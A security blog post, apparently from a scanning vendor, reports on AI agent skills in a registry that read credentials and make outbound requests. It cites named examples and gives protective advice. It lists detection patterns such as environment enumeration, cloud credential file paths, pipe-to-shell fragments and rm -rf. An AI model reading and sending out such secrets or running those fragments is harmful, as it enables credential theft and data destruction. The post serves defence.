Blog
3,326 OpenClaw Skills Can Access Your Credentials. Here's What That Means.
March 10, 2026 · 7 min read · By 4Worlds
When you install an AI agent skill, you're trusting it with your environment. That includes your API keys, tokens, and secrets stored in environment variables. After scanning all 19,461 skills in the OpenClaw registry, we found that 3,326 of them access credentials in some form. That's 17.1% of the entire ecosystem.
Not all of them are malicious. Many skills legitimately need an API key to function. But 1,247 of those credential-accessing skills scored as Dangerous, and 1,909 of them also make outbound network requests. That combination is the textbook pattern for credential exfiltration.
What "credential access" means in practice
ClawAudit flags a skill for credential access when its code reads environment variables, references well-known secret paths, or accesses credential stores. The most common patterns:
- Environment variable reads:
process.env.API_KEY,os.environ.get("SECRET"), or${OPENAI_API_KEY}in shell commands - Cloud credential paths:
~/.aws/credentials,~/.config/gcloud,~/.kube/config - Dotenv loading:
require('dotenv')or reading.envfiles directly - Process environment enumeration:
Object.keys(process.env)or/proc/self/environreads that dump all environment variables at once
The dangerous combination: credentials + network
A skill reading process.env.API_KEY is not automatically dangerous.
Most API wrapper skills need a key to call their target service.
The threat emerges when credential access combines with other capabilities:
When a skill reads your API key, base64-encodes it, and sends it to an external server, ClawAudit flags that as a compound threat: "credential theft" or "encoded exfiltration." These compound detections carry critical severity because each step in the chain has a clear purpose in an attack.
Real examples from the registry
Here are actual skills from the OpenClaw registry that demonstrate the patterns we detect. Each of these scored 20 out of 100 (Dangerous).
Pipe-to-shell with credential access
appback/gridclash combines file read, file write,
credential access, and outbound network requests. It contains pipe-to-python patterns
(curl ... | python) that download and execute remote code.
It also has a hardcoded credential in the source. Four compound threats detected.
Unicode homoglyphs hiding shell injection
byron-mckeeby/ethereum-read-only sounds harmless. "Read only."
But it uses Unicode homoglyph characters to evade keyword detection, contains
curl | sh patterns (supply chain attack vector),
and accesses credentials alongside dynamic eval and data encoding. Four compound threats.
Destructive commands with credential theft
c4chuan/idea-storm has process execution, network access,
package installation, file reads, and credential access. It contains
rm -rf from root or home, Unicode homoglyphs, and
a hardcoded credential. Five capabilities, four compound threats.
The legitimate vs. malicious spectrum
Of the 3,326 skills with credential access:
- 1,247 are Dangerous (37.5%) with critical findings and compound threats
- 1,454 are Risky (43.7%) with significant concerns that warrant manual review
- 625 are Caution (18.8%) with minor issues, likely legitimate but worth checking
- 0 are Trusted because any credential access pattern adds findings that lower the score
The zero in the Trusted tier is by design. Even a well-built skill that accesses
process.env.API_KEY gets a credential access finding.
That doesn't make it malicious, but it does mean you should review what it does with that key.
A Caution-tier skill that reads one key to call one API is different from a Dangerous-tier
skill that enumerates all your environment variables and sends them to an unknown server.
Credential stores: the 109 worst offenders
Beyond reading environment variables, 109 skills interact with credential storage systems:
writing to keychains, modifying .ssh directories,
or creating credential files. 57 of these are Dangerous.
Skills like happydog-intj/github-passwordless-setup and
kakatkarakshay/proton-pass interact with credential stores,
install packages, and make network requests. Whether they're doing what they claim or
something else entirely requires more than reading the description.
How to protect yourself
- Audit every skill before installing. Run it through ClawAudit or the API. If it scores below 40, read the findings carefully before proceeding.
- Check what credentials it needs and why.
A Slack integration skill needs a Slack token. It should not also need your
AWS_SECRET_ACCESS_KEY. - Watch for credential + network combinations. If a skill reads your keys and makes outbound requests, verify where those requests go. The registry shows capability combinations for every scanned skill.
- Use scoped credentials. Give skills the minimum permissions they need. A read-only API key is better than a full-access key. A project-scoped token is better than an account-wide one.
- Rotate keys if you've installed a flagged skill. If you've already installed a skill that ClawAudit flags as Dangerous with credential access, rotate the affected keys. The skill may have already exfiltrated them.
The bigger picture
Credential theft in AI agent skills is a supply chain problem. The OpenClaw ecosystem has no built-in credential sandboxing. When you give an agent access to your environment, every installed skill can read every key. There's no per-skill permission scoping, no runtime isolation, and no audit trail for credential access.
Until that changes, static analysis is the best pre-installation defense. We can't tell you whether a skill will steal your keys. But we can tell you which skills can, and which ones show patterns consistent with doing exactly that.
Browse the full skill registry to check any skill's credential access status, or read the State of OpenClaw Security report for the complete ecosystem analysis. For more on how attacks work in this space, see our posts on prompt injection and the most dangerous skills we found.